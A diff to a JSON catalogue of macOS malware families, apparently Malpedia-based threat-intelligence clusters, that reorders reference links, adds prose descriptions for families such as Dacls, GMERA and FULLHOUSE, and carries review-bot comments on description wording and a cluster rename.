"https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", + "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", + "https://www.youtube.com/watch?v=1NkzTKkEM2k", + "https://objective-see.com/blog/blog_0x54.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.youtube.com/watch?v=rjA0Vf75cYk" + "https://www.youtube.com/watch?v=rjA0Vf75cYk", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://objective-see.com/blog/blog_0x5F.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b" ], "synonyms": [], "type": [] @@ -8692,8 +9071,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", - "https://github.com/kai5263499/Bella", "https://threatintel.blog/OPBlueRaven-Part2/", + "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], "synonyms": [], 
@@ -8707,10 +9086,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore", - "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", - "https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20", "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html", + "https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20", "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c", + "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ @@ -8755,8 +9134,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds", - "https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/", "https://objective-see.com/blog/blog_0x69.html", + "https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/", "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/" ], "synonyms": [ 
@@ -8772,11 +9151,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.choziosi", - "https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension", - "https://www.th3protocol.com/2022/Choziosi-Loader", - "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension", "https://redcanary.com/blog/chromeloader/", - "https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/" + "https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/", + "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension", + "https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension", + "https://www.th3protocol.com/2022/Choziosi-Loader" ], "synonyms": [ "ChromeLoader", @@ -8792,8 +9171,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cloud_mensis", - "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/", - "https://twitter.com/ESETresearch/status/1575103839115804672" + "https://twitter.com/ESETresearch/status/1575103839115804672", + "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/" ], "synonyms": [], "type": [] 
@@ -8802,12 +9181,12 @@ "value": "CloudMensis" }, { - "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn’t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim’s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim’s hard drive to a remote server\r\n- update itself to a newer version", + "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. 
\r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). 
The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/" + "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [], "type": [] @@ -8876,8 +9255,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html" ], "synonyms": [], "type": [] 
@@ -8899,21 +9278,21 @@ "value": "Crossrider" }, { - "description": "", + "description": "According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.\r\n\r\nResearch shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls", - "https://objective-see.com/blog/blog_0x57.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://objective-see.com/blog/blog_0x5F.html", + "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://objective-see.com/blog/blog_0x57.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability", "https://www.sygnia.co/mata-framework", - "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", - "https://objective-see.com/blog/blog_0x5F.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - 
"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/" ], "synonyms": [], "type": [] 
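Review bot: The new Dacls description (the `+ "description"` line at the top of this hunk) ends in end-user removal advice — "no RAT is harmless and should be uninstalled immediately" — and its only platform statement, "targets Linux and the Windows Operating System", omits macOS even though this is the osx.dacls cluster and the refs in the same hunk (objective-see, the Trend Micro "new-macos-dacls-rat-backdoor" post, the Malwarebytes "new-mac-variant ... trojanized-2fa-app" post) document the macOS build. The text is presumably pulled verbatim from the upstream source, but a CTI cluster should carry the attributable facts and drop the advice, along the lines of `"description": "Dacls is a remote access Trojan attributed to Lazarus Group with Linux, Windows and macOS variants; the macOS build was distributed via a trojanized 2FA app."` (constructed wording). The same advisory sentence pattern appears in the GMERA description in the hunk at @@ -9111 and the Shlayer description at @@ -9656. The Dacls entry's uuid and value lines are outside this hunk.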
@@ -8976,7 +9355,7 @@ "value": "Dummy" }, { - "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim’s webcam\r\n- Sending emails with an attachment", + "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. 
After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", @@ -8989,12 +9368,12 @@ "value": "Eleanor" }, { - "description": "", + "description": "According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, MacOS, and Linux users. Cyber criminals behind ElectroRAT target mainly cryptocurrency users. This RAT is distributed via the trojanized Jamm, eTrader, and DaoPoker applications.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat", - "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://objective-see.com/blog/blog_0x61.html", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf" ], "synonyms": [], 
@@ -9022,16 +9401,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest",
+ "https://objective-see.com/blog/blog_0x59.html",
+ "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://github.com/gdbinit/evilquest_deobfuscator",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/",
 "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
 "https://twitter.com/dineshdina04/status/1277668001538433025",
 "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/",
- "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
- "https://objective-see.com/blog/blog_0x59.html",
- "https://github.com/gdbinit/evilquest_deobfuscator",
- "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/"
+ "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/"
 ],
 "synonyms": [
 "ThiefQuest"
@@ -9059,12 +9438,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher",
- "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
 "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
- "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
 "https://objective-see.com/blog/blog_0x4F.html",
 "https://securelist.com/finspy-unseen-findings/104322/",
- "https://objective-see.com/blog/blog_0x5F.html"
+ "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/"
 ],
 "synonyms": [],
 "type": []
@@ -9077,11 +9456,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
- "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
- "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html",
 "https://en.wikipedia.org/wiki/Flashback_(Trojan)",
- "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html"
+ "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
+ "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
+ "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html"
 ],
 "synonyms": [
 "FakeFlash"
@@ -9096,12 +9475,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly",
- "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf",
- "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/",
 "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
- "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
 "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/",
- "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
+ "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
+ "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
+ "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf"
 ],
 "synonyms": [
 "Quimitchin"
@@ -9111,28 +9490,41 @@ "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, + { + "description": "Fullhouse (AKA FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. Fullhouse is written in C/C++ and includes the capabilities of a tunneler and backdoor commands support such as shell command execution, file transfer, file managment, and process injection. C2 communications occur via HTTP and require configuration through the command line or a configuration file.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fullhouse", + "https://www.mandiant.com/resources/blog/north-korea-supply-chain" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ab781d8-214d-41e2-acc9-23ded4f77663", + "value": "FULLHOUSE" + }, { "description": "This multi-platform malware is a ObjectiveC written macOS variant dubbed GIMMICK by Volexity. This malware is a file-based C2 implant used by Storm Cloud.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gimmick", - "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/", - "https://cybersecuritynews.com/gimmick-malware-attacks/" + "https://cybersecuritynews.com/gimmick-malware-attacks/", + "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/" ], "synonyms": [], "type": [] }, "uuid": "0e259d0f-717a-4ced-ac58-6fe9d72e2c96", - "value": "GIMMICK" + "value": "GIMMICK (OS X)" }, { - "description": "", + "description": "According to PCrisk, GMERA (also known as Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app created for Mac users.\r\n\r\nResearch shows that there are two variants of this malware, one detected as Trojan.MacOS.GMERA.A and the other as Trojan.MacOS.GMERA.B. Cyber criminals proliferate GMERA to steal various information and upload it to a website under their control. 
To avoid damage caused by this malware, remove GMERA immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera", + "https://objective-see.com/blog/blog_0x53.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/", - "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/", - "https://objective-see.com/blog/blog_0x53.html" + "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/" ], "synonyms": [ "Kassi", @@ -9144,7 +9536,7 @@ "value": "Gmera" }, { - "description": "", + "description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named L\u00ea Thu H\u00e0 (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", @@ -9178,7 +9570,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.interception", - "https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/" + "https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto", + "https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/", + "https://twitter.com/ESETresearch/status/1559553324998955010" ], "synonyms": [], "type": [] 
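Review bot: The GIMMICK entry's `value` changes from `"GIMMICK"` to `"GIMMICK (OS X)"` while its `"synonyms": []` stays empty, so any consumer that resolves this cluster by name rather than by its uuid `0e259d0f-717a-4ced-ac58-6fe9d72e2c96` loses the match; the suffix presumably disambiguates it from a non-macOS GIMMICK cluster, and the old name belongs in synonyms: `"synonyms": ["GIMMICK"],`. The same rename without a preserved synonym happens to RustBucket in the hunk at @@ -9656, whose end lies outside this chunk. Separately, the new FULLHOUSE description carries the spelling slip "file managment", which is likely inherited from the upstream text and is best fixed at the source so the next regeneration does not reintroduce it.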
@@ -9191,18 +9585,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab",
- "https://www.malwarology.com/posts/5-janicab-part_1/",
- "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
- "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/",
- "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/",
 "https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/",
- "https://archive.f-secure.com/weblog/archives/00002576.html",
- "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/",
 "https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/",
+ "https://archive.f-secure.com/weblog/archives/00002576.html",
+ "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
 "https://www.macmark.de/blog/osx_blog_2013-08-a.php",
- "https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
+ "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/",
+ "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/",
+ "https://www.malwarology.com/posts/5-janicab-part_1/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/",
+ "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html"
 ],
 "synonyms": [],
 "type": []
@@ -9210,13 +9604,26 @@
 "uuid": "01325d85-297f-40d5-b829-df9bd996af5a",
 "value": "Janicab (OS X)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.jokerspy",
+ "https://www.elastic.co/security-labs/inital-research-of-jokerspy"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "171b0695-8cea-4ca6-a3f0-c9a8455ef9de",
+ "value": "JokerSpy"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger",
- "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/",
 "https://objective-see.com/blog/blog_0x16.html",
+ "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/",
 "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html"
 ],
 "synonyms": [],
@@ -9230,10 +9637,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap",
+ "https://objective-see.com/blog/blog_0x16.html",
 "https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/",
 "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
- "https://github.com/eset/malware-ioc/tree/master/keydnap",
- "https://objective-see.com/blog/blog_0x16.html"
+ "https://github.com/eset/malware-ioc/tree/master/keydnap"
 ],
 "synonyms": [],
 "type": []
@@ -9261,11 +9668,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
 "https://objective-see.com/blog/blog_0x16.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
 "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
- "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
 ],
 "synonyms": [
 "JHUHUGIT",
@@ -9324,8 +9731,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage",
- "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/",
- "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis"
+ "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis",
+ "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/"
 ],
 "synonyms": [],
 "type": []
@@ -9339,7 +9746,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.lockbit",
 "https://twitter.com/malwrhunterteam/status/1647384505550876675",
- "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf"
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/",
+ "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -9379,8 +9788,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom",
- "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service",
- "https://objective-see.com/blog/blog_0x1E.html"
+ "https://objective-see.com/blog/blog_0x1E.html",
+ "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service"
 ],
 "synonyms": [],
 "type": []
@@ -9432,10 +9841,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.anquanke.com/post/id/223817",
+ "https://twitter.com/BitsOfBinary/status/1337330286787518464",
 "https://twitter.com/BitsOfBinary/status/1321488299932983296",
- "https://twitter.com/BitsOfBinary/status/1337330286787518464"
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.anquanke.com/post/id/223817"
 ],
 "synonyms": [],
 "type": []
@@ -9471,22 +9880,35 @@ "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", "value": "Mughthesec" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.netwire", + "https://www.intego.com/mac-security-blog/fbi-shuts-down-11-year-old-netwire-rat-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f0d52afd-e7c9-4bd1-be8a-9ab09b14ea24", + "value": "NetWire" + }, { "description": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", - "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - 